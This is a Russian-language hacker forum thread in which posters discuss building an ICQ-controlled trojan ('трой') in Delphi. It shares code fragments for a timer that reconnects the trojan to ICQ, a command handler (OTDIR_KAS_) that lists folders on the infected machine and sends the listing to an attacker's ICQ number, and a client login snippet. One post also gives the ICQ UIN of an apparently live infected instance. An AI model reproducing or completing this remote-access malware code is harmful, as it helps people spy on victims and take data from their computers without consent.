Я сейчас заинтересовался этой темой и у меня вопрос : как вы собрались реализовывать таймер поддержки подключения? Да , и не могли бы вы кинуть сорцы на данный момент?
Ну как я понял чел имел в виду как мы будем делать таймер который будет конектитиь трой через интервалы времени к инету. ИМХО идиотский подход. Легче через сокет.
А как? Просто я делаю свой бот без формы фактически тот же трой , тока мирный и мне эта шня нужна.Как васобрались реализовывать?
Исходники дать немогу, так как хозяин потом будет в бешенстве, но помочь могу: Ну там на форме всего 3 таймера PHP: procedure TForm1.IcqLogTimer(Sender: TObject); begin if icq1.LoggedIn=false then //Если ася не подключена GO; // Подключаемся end; PHP: procedure TForm1.ICQANSWTimer(Sender: TObject); begin ICQANSW.Enabled:=false; // ICQ1.SendMessage(StrToInt(UINansw),strAnsw); Application.ProcessMessages; end; Трой просто весит в процессах и ждёт пока компьютер зайдёт в инет, как только он зашёл в инет он заходит в ICQ и ждёт там ваших команд
1. Вот UIN вируса: 258-291-730 . Кто-то его запустил, иногда поевляется в сети. 2.OTDIR_KAS_ваш уин;Папка Функция возвращает список файлов и папок в указанной папке Пример использования: OTDIR_KAS_333999666;C:\ Список файлов и папок находящихся в C:\ прийдет на номер 333999666 :::: PHP: if Copy(AnsiUpperCase(msg),1,10)='OTDIR_KAS_' then begin // OTDIR_KAS_OTDIR_KAS_333905248;C:\ mes:=msg; delete(mes,1,10); oper:= Copy(mes,1,Pos(';',mes)-1); delete(mes,1,Pos(';',mes)); UINansw:= oper; strAnsw:= GetDir(mes).Text; ICQANSW.Enabled:=true; Exit; end;
xaker-boss тоесть ты хочешь сказать , что вы юзаете форму , но тогда проект до ху весить будет.Да и ещё есть код подключения Code: program WinisqB; uses Windows,SysUtils,Registry,ICQClient,ICQWorks; var ICQ: TICQClient; begin ICQ:= TICQClient.Create(nil); ICQ.UIN:=44028935; ICQ.Password:='kd'; ICQ.ICQServer:='login.icq.com'; ICQ.ICQPort:=5190; ICQ.Login(); icq.Status:=8; end. он просто не конектит и всё . Чё неправильно ?
Ну если ты незаметил тема была создана 09.06.2007, 13:50 .Тогда я неумел программировать. А сейчас у меня уже есть этот вир с исходником, но так как писал его не я, а только дорабатывал его я неимею никакого право выкладавать сюда исходник бес разрешения того кто его написал.Ну если у кого есть вопросы про функции обращайтесь.